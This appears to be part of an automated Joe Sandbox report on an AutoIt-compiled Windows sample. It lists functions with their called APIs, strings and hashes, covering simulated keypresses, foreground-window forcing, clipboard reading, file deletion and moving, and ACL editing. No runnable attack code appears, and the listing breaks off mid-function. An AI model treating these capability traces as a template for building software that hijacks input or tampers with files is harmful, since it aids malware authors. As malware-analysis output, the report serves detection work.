Opcode Fuzzy Hash: 0eae25b8a2c3c686fc095b0531bdd42b6b3248c3d7c341ec531a67d4213f4546
Instruction Fuzzy Hash: 8032BD70604201AFD710DF64C884AAABBE4FF48358F14893AFA59872B1D739DD49CB99

Function 0047A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0047AFDB

Strings

%d/%02d/%02d, xrefs: 0047AD0A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: d21862853db5bbb0421656566c82814cb1e958ab38940db6cd05bf424b4598c4
Instruction ID: ef900f849fac1b3b00442bdf457451d12cf46ffab28067dc6ce9bd9e87920c14
Opcode Fuzzy Hash: d21862853db5bbb0421656566c82814cb1e958ab38940db6cd05bf424b4598c4
Instruction Fuzzy Hash: F312EFB1504214ABEB258F65CC49FEF7BB8EF85710F10822BF519DB290DB788951CB1A

Function 0042F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0042F796
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00484388
IsIconic.USER32(000000FF), ref: 00484391
ShowWindow.USER32(000000FF,00000009), ref: 0048439E
SetForegroundWindow.USER32(000000FF), ref: 004843A8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004843BE
GetCurrentThreadId.KERNEL32 ref: 004843C5
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004843D1
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004843E2
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004843EA
AttachThreadInput.USER32(00000000,?,00000001), ref: 004843F2
SetForegroundWindow.USER32(000000FF), ref: 004843F5
MapVirtualKeyW.USER32(00000012,00000000), ref: 0048440A
keybd_event.USER32(00000012,00000000), ref: 00484415
MapVirtualKeyW.USER32(00000012,00000000), ref: 0048441F
keybd_event.USER32(00000012,00000000), ref: 00484424
MapVirtualKeyW.USER32(00000012,00000000), ref: 0048442D
keybd_event.USER32(00000012,00000000), ref: 00484432
MapVirtualKeyW.USER32(00000012,00000000), ref: 0048443C
keybd_event.USER32(00000012,00000000), ref: 00484441
SetForegroundWindow.USER32(000000FF), ref: 00484444
AttachThreadInput.USER32(000000FF,?,00000000), ref: 0048446B

Strings

Shell_TrayWnd, xrefs: 00484383

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 93e26eccbb67baf466178c2c710b402ac1967166a3d4626109641d5ae2cb87de
Instruction ID: 5c9025f4009ace7777a162e3a8f7ab3188249ff5a511107d28e97c741963c0ff
Opcode Fuzzy Hash: 93e26eccbb67baf466178c2c710b402ac1967166a3d4626109641d5ae2cb87de
Instruction Fuzzy Hash: C8317271E40218BBEB216BB19C49F7F3E6CEB94B50F114037FA04AA1D0C6B45D01ABA9

Function 0041BDF0 Relevance: 39.1, APIs: 12, Strings: 10, Instructions: 643COMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004D22E8,?,00000000,?,00413E2E,?,00000000,?,004ADBF0,00000000,?), ref: 0041BE8B
GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00413E2E,?,00000000,?,004ADBF0,00000000,?,00000002), ref: 0041BEA7
__wsplitpath.LIBCMT ref: 0041BF19

Part of subcall function 0043297D: __wsplitpath_helper.LIBCMT ref: 004329BD

_wcscpy.LIBCMT ref: 0041BF31
_wcscat.LIBCMT ref: 0041BF46
SetCurrentDirectoryW.KERNEL32(?), ref: 0041BF56
_wcscpy.LIBCMT ref: 0041C03E
_wcscpy.LIBCMT ref: 0041C1ED
SetCurrentDirectoryW.KERNEL32 ref: 0041C250

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

Part of subcall function 0041C320: _memmove.LIBCMT ref: 0041C419

Strings

Unterminated string, xrefs: 004839E1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00483577
"M, xrefs: 0041C207
AU3!, xrefs: 0041BEE0
>>>AUTOIT SCRIPT<<<, xrefs: 00483611
Error opening the file, xrefs: 00483593, 00483639
G-A, xrefs: 0048366E, 004836A8
Bad directive syntax error, xrefs: 0048393E
_, xrefs: 0041C281
EA06, xrefs: 004835AA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$G-A$Unterminated string$_$"M
API String ID: 2542276039-3969368670
Opcode ID: 34b2e7d9eabee144d7b2b360dfedfcd3d85a5594dd5c3df43f4d81f266f14bc5
Instruction ID: b09ebccf98f5c228ddecfbe8d450b51240947275376f01c45b3d2cdbb8979f0d
Opcode Fuzzy Hash: 34b2e7d9eabee144d7b2b360dfedfcd3d85a5594dd5c3df43f4d81f266f14bc5
Instruction Fuzzy Hash: 8C428F715083459BC710EF61C881BEBB7E4AF94304F00492EF98587252EB79DA49CB9B

Function 00456B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004131DA

Part of subcall function 00457B9F: __wsplitpath.LIBCMT ref: 00457BBC
Part of subcall function 00457B9F: __wsplitpath.LIBCMT ref: 00457BCF

Part of subcall function 00457C0C: GetFileAttributesW.KERNEL32(?,00456A7B), ref: 00457C0D

_wcscat.LIBCMT ref: 00456B9D
_wcscat.LIBCMT ref: 00456BBB
__wsplitpath.LIBCMT ref: 00456BE2
FindFirstFileW.KERNEL32(?,?), ref: 00456BF8
_wcscpy.LIBCMT ref: 00456C57
_wcscat.LIBCMT ref: 00456C6A
_wcscat.LIBCMT ref: 00456C7D
lstrcmpiW.KERNEL32(?,?), ref: 00456CAB
DeleteFileW.KERNEL32(?), ref: 00456CBC
MoveFileW.KERNEL32(?,?), ref: 00456CDB
MoveFileW.KERNEL32(?,?), ref: 00456CEA
CopyFileW.KERNEL32(?,?,00000000), ref: 00456CFF
DeleteFileW.KERNEL32(?), ref: 00456D10
FindNextFileW.KERNEL32(00000000,00000010), ref: 00456D37
FindClose.KERNEL32(00000000), ref: 00456D53
FindClose.KERNEL32(00000000), ref: 00456D61

Strings

\*.*, xrefs: 00456B8C, 00456B9B, 00456BB9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
String ID: \*.*
API String ID: 1867810238-1173974218
Opcode ID: 624dd51cd8bfb80012a584ffc9738c8ff7cca6fc652beb9a701f7fe73b92c84a
Instruction ID: f47341c1d8ebfd5f317a8620f47a4a4eb3f7ee2a14d5c66ff4938d78ad774ced
Opcode Fuzzy Hash: 624dd51cd8bfb80012a584ffc9738c8ff7cca6fc652beb9a701f7fe73b92c84a
Instruction Fuzzy Hash: 1C515072900118AADB21DBA0DC45EEE777CAF19305F4445EBE949A3102DB389B8DCF69

Function 00467099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(004ADBF0), ref: 004670C3
IsClipboardFormatAvailable.USER32(0000000D), ref: 004670D1
GetClipboardData.USER32(0000000D), ref: 004670D9
CloseClipboard.USER32 ref: 004670E5
GlobalLock.KERNEL32(00000000), ref: 00467101
CloseClipboard.USER32 ref: 0046710B
GlobalUnlock.KERNEL32(00000000), ref: 00467120
IsClipboardFormatAvailable.USER32(00000001), ref: 0046712D
GetClipboardData.USER32(00000001), ref: 00467135
GlobalLock.KERNEL32(00000000), ref: 00467142
GlobalUnlock.KERNEL32(00000000), ref: 00467176
CloseClipboard.USER32 ref: 00467283

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: fde38e170ae79941ca805a26c23cbebcb006e9876cb80fc57e01fd83307163a1
Instruction ID: 1cf2b30e70eabcc44223fc7cc8809bd004b418c5462dc6642d5868f36e2d7582
Opcode Fuzzy Hash: fde38e170ae79941ca805a26c23cbebcb006e9876cb80fc57e01fd83307163a1
Instruction Fuzzy Hash: 3151BF31608201ABD301AF61DC96FAF77A8AF94B09F00053FF546D62D1EB68DC458A6B

Function 0045FDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0045FE03
FindClose.KERNEL32(00000000), ref: 0045FE57
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0045FE7C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0045FE93
FileTimeToSystemTime.KERNEL32(?,?), ref: 0045FEBA
__swprintf.LIBCMT ref: 0045FF06
__swprintf.LIBCMT ref: 0045FF3F

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

__swprintf.LIBCMT ref: 0045FF93

Part of subcall function 0043234B: __woutput_l.LIBCMT ref: 004323A4

__swprintf.LIBCMT ref: 0045FFE1
__swprintf.LIBCMT ref: 00460030
__swprintf.LIBCMT ref: 0046007F
__swprintf.LIBCMT ref: 004600CE

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0045FF00
%4d, xrefs: 0045FF39
%02d, xrefs: 0045FF88, 0045FF91, 0045FFDF, 0046002E, 0046007D, 004600CC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 108614129-2428617273
Opcode ID: b23e8f204193fbf683094b0af31c60c79d89805ad0116ff93e5227d2d0bfd030
Instruction ID: bf7aeaefdc109f9bf2ed606a3fc675a45f596bfaca423fa23ba9b97ed6ad4bc9
Opcode Fuzzy Hash: b23e8f204193fbf683094b0af31c60c79d89805ad0116ff93e5227d2d0bfd030
Instruction Fuzzy Hash: 42A13072508344ABC300EFA5CC85DEFB7ECAF98704F44492EB585C2151EB78EA49C7A6

Function 00462044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00462065
_wcscmp.LIBCMT ref: 0046207A
_wcscmp.LIBCMT ref: 00462091
GetFileAttributesW.KERNEL32(?), ref: 004620A3
SetFileAttributesW.KERNEL32(?,?), ref: 004620BD
FindNextFileW.KERNEL32(00000000,?), ref: 004620D5
FindClose.KERNEL32(00000000), ref: 004620E0
FindFirstFileW.KERNEL32(*.*,?), ref: 004620FC
_wcscmp.LIBCMT ref: 00462123
_wcscmp.LIBCMT ref: 0046213A
SetCurrentDirectoryW.KERNEL32(?), ref: 0046214C
SetCurrentDirectoryW.KERNEL32(004C3A68), ref: 0046216A
FindNextFileW.KERNEL32(00000000,00000010), ref: 00462174
FindClose.KERNEL32(00000000), ref: 00462181
FindClose.KERNEL32(00000000), ref: 00462191

Strings

*.*, xrefs: 004620F7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 59a0f2fe5fc787d09985a509f11affc31a084a9bb2b10d09d73f2ba223978a4c
Instruction ID: 8bae7fa96f2a530229a66ad2cc7b9fa8e0cbd5942fb9ede331224a216a3c6905
Opcode Fuzzy Hash: 59a0f2fe5fc787d09985a509f11affc31a084a9bb2b10d09d73f2ba223978a4c
Instruction Fuzzy Hash: 7031C232A046197ACB249FA5DD49EDF73AC9F0A321F104067E911E3190EBB8DB44CA6D

Function 0047F122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

DragQueryPoint.SHELL32(?,?), ref: 0047F14B

Part of subcall function 0047D5EE: ClientToScreen.USER32(?,?), ref: 0047D617
Part of subcall function 0047D5EE: GetWindowRect.USER32(?,?), ref: 0047D68D
Part of subcall function 0047D5EE: PtInRect.USER32(?,?,0047EB2C), ref: 0047D69D

SendMessageW.USER32(?,000000B0,?,?), ref: 0047F1B4
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0047F1BF
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0047F1E2
_wcscat.LIBCMT ref: 0047F212
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0047F229
SendMessageW.USER32(?,000000B0,?,?), ref: 0047F242
SendMessageW.USER32(?,000000B1,?,?), ref: 0047F259
SendMessageW.USER32(?,000000B1,?,?), ref: 0047F27B
DragFinish.SHELL32(?), ref: 0047F282
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0047F36D

Strings

@GUI_DRAGFILE, xrefs: 0047F31C
@GUI_DRAGID, xrefs: 0047F2E1
@GUI_DROPID, xrefs: 0047F2A2

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: b9934ab6d1532c85b2dcc208ea97df496aa2429f6138ec8fc922e626af271b40
Instruction ID: 9a61fbdded8627875436a47dd0ed8bad4003144c7aedd90257799e11faaf998c
Opcode Fuzzy Hash: b9934ab6d1532c85b2dcc208ea97df496aa2429f6138ec8fc922e626af271b40
Instruction Fuzzy Hash: E1618B72508300AFC700EF61DC85E9BBBF8FF88754F404A2EF595921A1DB749A49CB5A

Function 0046219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 004621C0
_wcscmp.LIBCMT ref: 004621D5
_wcscmp.LIBCMT ref: 004621EC

Part of subcall function 00457606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00457621

FindNextFileW.KERNEL32(00000000,?), ref: 0046221B
FindClose.KERNEL32(00000000), ref: 00462226
FindFirstFileW.KERNEL32(*.*,?), ref: 00462242
_wcscmp.LIBCMT ref: 00462269
_wcscmp.LIBCMT ref: 00462280
SetCurrentDirectoryW.KERNEL32(?), ref: 00462292
SetCurrentDirectoryW.KERNEL32(004C3A68), ref: 004622B0
FindNextFileW.KERNEL32(00000000,00000010), ref: 004622BA
FindClose.KERNEL32(00000000), ref: 004622C7
FindClose.KERNEL32(00000000), ref: 004622D7

Strings

*.*, xrefs: 0046223D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: acb64a4924c2723fbbe56e0de159d54141cfe4eeac558e0a6fd069486c2c2b5c
Instruction ID: 42c53fc91f4cfd55abce61656e16f1c19ed5b179f0f747225d7e3c7def4c15b0
Opcode Fuzzy Hash: acb64a4924c2723fbbe56e0de159d54141cfe4eeac558e0a6fd069486c2c2b5c
Instruction Fuzzy Hash: ED310536A006197ACB24DFA4DD58FDF33ACAF15325F1041A7E810A3190E7B89A85CA6D

Function 0043BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a315e867ac0ddfadf3884c7e3253c0fcc81f2d0c8d8d91a76dae252a21bbbebd
Instruction ID: 48167ebfc60c510b25495fa6641a1040ff18862d55ba2e536997cd54a6a68043
Opcode Fuzzy Hash: a315e867ac0ddfadf3884c7e3253c0fcc81f2d0c8d8d91a76dae252a21bbbebd
Instruction Fuzzy Hash: B9327075B022289FDB24CF15DD816EAB7B5FB4A310F0451EAE40AE7A41D7349E80CF5A

Function 0047ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0047ED0C
GetFocus.USER32 ref: 0047ED1C
GetDlgCtrlID.USER32(00000000), ref: 0047ED27
_memset.LIBCMT ref: 0047EE52
GetMenuItemInfoW.USER32 ref: 0047EE7D
GetMenuItemCount.USER32(00000000), ref: 0047EE9D
GetMenuItemID.USER32(?,00000000), ref: 0047EEB0
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0047EEE4
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0047EF2C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0047EF64
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0047EF99

Strings

0, xrefs: 0047EE4A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 6e0d1314573f42669f3b5af3324b9e3b9bce5d8885cd18b0bfda46d133ff5b2a
Instruction ID: 2bfba5dbfa8635b436ff2e0609f2fdfb0dc63b1a44499f7ebbcd829b503491ef
Opcode Fuzzy Hash: 6e0d1314573f42669f3b5af3324b9e3b9bce5d8885cd18b0bfda46d133ff5b2a
Instruction Fuzzy Hash: 86815E71504301AFD720DF16D884AABBBE8FB8C354F008A6EF99997291D734D905CB5A

Function 0044B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0044B903
Part of subcall function 0044B8E7: GetLastError.KERNEL32(?,0044B3CB,?,?,?), ref: 0044B90D
Part of subcall function 0044B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0044B3CB,?,?,?), ref: 0044B91C
Part of subcall function 0044B8E7: RtlAllocateHeap.NTDLL(00000000,?,0044B3CB), ref: 0044B923
Part of subcall function 0044B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0044B93A

Part of subcall function 0044B982: GetProcessHeap.KERNEL32(00000008,0044B3E1,00000000,00000000,?,0044B3E1,?), ref: 0044B98E
Part of subcall function 0044B982: RtlAllocateHeap.NTDLL(00000000,?,0044B3E1), ref: 0044B995
Part of subcall function 0044B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0044B3E1,?), ref: 0044B9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044B3FC
_memset.LIBCMT ref: 0044B411
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0044B430
GetLengthSid.ADVAPI32(?), ref: 0044B441
GetAce.ADVAPI32(?,00000000,?), ref: 0044B47E
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044B49A
GetLengthSid.ADVAPI32(?), ref: 0044B4B7
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0044B4C6
RtlAllocateHeap.NTDLL(00000000), ref: 0044B4CD
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044B4EE
CopySid.ADVAPI32(00000000), ref: 0044B4F5
